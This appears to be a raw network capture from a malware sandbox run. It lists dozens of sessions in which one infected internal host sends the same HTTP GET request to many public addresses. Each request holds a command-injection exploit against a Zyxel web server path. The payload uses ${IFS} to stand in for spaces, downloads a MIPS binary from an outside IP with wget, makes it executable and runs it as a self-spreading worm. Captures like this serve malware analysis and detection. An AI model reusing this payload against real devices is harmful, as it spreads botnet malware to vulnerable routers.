                                            Feb 2, 2024 06:21:23.849303007 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7372192.168.2.155802060.143.237.61443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:23.849323988 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7373192.168.2.1554064203.165.26.53443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:23.849380016 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7374192.168.2.1542144113.210.128.82443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:23.849414110 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7375192.168.2.1560566129.19.36.118443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:23.849462986 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7376192.168.2.15450909.115.210.206443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:23.849510908 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7377192.168.2.155740050.100.202.68443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:23.849536896 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7378192.168.2.155695083.191.199.27443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:23.849574089 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7379192.168.2.1546684118.34.176.191443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:23.849627018 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7380192.168.2.1549224202.116.194.128443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:23.849682093 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7381192.168.2.155896689.195.202.187443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:23.849714994 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7382192.168.2.153891267.203.108.90443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:23.849745989 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7383192.168.2.155533448.106.112.62443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:23.849785089 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7384192.168.2.153542435.234.78.224443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:23.849824905 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7385192.168.2.154792613.36.50.161443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:23.849867105 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7386192.168.2.1548608182.238.210.217443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:23.849915981 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7387192.168.2.1541304173.65.65.197443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:23.849951029 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7388192.168.2.1558482126.53.45.4443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:23.849981070 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7389192.168.2.153321434.116.77.126443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:23.850011110 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7390192.168.2.155002286.10.23.10443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:23.850052118 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7391192.168.2.1537266219.82.77.253443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:23.850106001 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7392192.168.2.154035432.185.74.179443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:23.850152969 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7393192.168.2.1543078106.211.83.199443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:23.850169897 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7394192.168.2.1542810216.106.140.235443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:23.850213051 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7395192.168.2.154242477.95.198.123443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:23.850256920 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7396192.168.2.1543438132.86.83.99443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:23.850294113 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7397192.168.2.154272250.91.207.92443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:23.850322008 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7398192.168.2.1550000172.240.107.199443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:23.850361109 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7399192.168.2.1546676169.251.73.217443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:23.850383997 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7400192.168.2.1547914147.235.223.246443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:23.850418091 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7401192.168.2.1560038189.35.233.73443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:23.850475073 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7402192.168.2.1533798204.145.172.157443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:23.850507021 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7403192.168.2.1553216120.73.0.253443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:23.850554943 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7404192.168.2.1552668222.53.75.206443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:23.850589037 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7405192.168.2.1551688218.195.246.103443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:23.850626945 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7406192.168.2.15460721.135.187.26443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:23.850688934 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7407192.168.2.1550128158.213.36.212443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:23.850697994 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7408192.168.2.1554466195.196.12.247443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:23.850733042 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7409192.168.2.154971478.172.203.45443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:23.850780010 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7410192.168.2.154831642.72.154.187443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:23.850810051 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7411192.168.2.1535374110.247.54.164443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:23.850861073 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7412192.168.2.1546014187.56.209.235443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:23.850902081 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7413192.168.2.1539986168.57.186.157443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:23.850940943 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7414192.168.2.1534182119.133.200.204443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:23.850990057 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7415192.168.2.1546734101.15.172.107443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:23.851025105 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7416192.168.2.1553128113.216.109.183443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:23.851064920 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7417192.168.2.154753076.16.13.108443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:23.851100922 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7418192.168.2.1552524200.37.53.144443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:23.851157904 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7419192.168.2.1552478102.53.105.98443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:23.851202011 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7420192.168.2.1558760108.38.250.120443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:23.851226091 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7421192.168.2.154449449.32.145.99443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:23.851262093 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7422192.168.2.15584608.79.34.53443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:23.851295948 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7423192.168.2.155328079.254.67.35443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:23.851352930 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7424192.168.2.154866037.161.227.161443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:23.851389885 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7425192.168.2.155804883.253.54.236443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:23.851428032 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7426192.168.2.1548066189.37.65.121443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:23.851461887 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7427192.168.2.155012466.113.154.245443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:23.851553917 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7428192.168.2.153300075.194.253.211443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:23.851583004 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7429192.168.2.1558860197.159.14.209443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:23.851615906 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7430192.168.2.1547618191.111.124.205443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:23.851644993 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7431192.168.2.1547258151.136.241.104443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:23.851699114 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7432192.168.2.1540934217.38.128.87443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:23.851756096 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7433192.168.2.155648889.88.110.192443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:23.851784945 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7434192.168.2.154097851.140.157.98443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:23.851833105 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7435192.168.2.15370149.47.129.160443
                                            TimestampBytes transferredDirectionData
